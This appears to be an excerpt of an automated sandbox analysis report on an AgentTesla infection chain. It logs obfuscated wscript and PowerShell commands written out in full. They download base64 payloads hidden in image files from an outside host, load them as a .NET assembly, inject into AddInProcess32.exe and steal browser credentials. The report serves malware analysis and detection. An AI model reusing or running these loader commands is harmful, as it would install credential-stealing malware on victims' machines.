'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 9F9008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtremdgtredgtrevdgtreddgtredgtrendgtredgtrezdgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremqdgtrexdgtredidgtreodgtredgtre3dgtredgdgtreodgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtrey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtremdgtredgtrevdgtreddgtredgtrendgtredgtrezdgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremqdgtrexdgtredidgtreodgtredgtre3dgtredgdgtreodgtredgtre3dgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtrey	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Tries to harvest and steal browser information (history, passwords, etc)

Stealing of Sensitive Information

Yara detected AgentTesla

